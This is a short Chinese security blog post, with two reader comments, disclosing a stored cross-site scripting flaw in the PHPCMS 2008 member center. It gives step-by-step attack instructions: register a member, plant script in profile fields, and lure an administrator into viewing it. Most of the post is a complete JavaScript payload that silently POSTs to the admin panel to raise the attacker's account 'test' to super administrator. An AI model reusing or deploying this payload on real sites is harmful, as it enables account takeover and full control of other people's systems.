phpcms2008会员中心某处xss

by 0day5_Saline 首先去注册一个会员,然后到会员中心随处修改资料,写入xss代码。诱发管理后台点击 [php] function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } return request; } var _x = ajax(); adduser(); function adduser() { src="admin.php?mod=phpcms&file=admin&action=add"; data="admin%5Busername%5D=test&admin%5Balloweditpassword%5D=1&roleids%5B%5D=1&admin%5Bdisabled%5D=0&dosubmit=+%C8%B7%B6%A8+"; xhr_act("POST",src,data); } function xhr_act(_m,_s,_a){ _x.open(_m,_s,false); if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); _x.send(_a); return _x.responseText; }[/php] 后台会自动加把用户test提升为超级管理员 1 2

2 条评论

  1. sugen

    ... test 密码是多少

    1. 0day5
      @sugen

      test用户是自己注册的。给出的js代码只是把test提升为管理而已

发表评论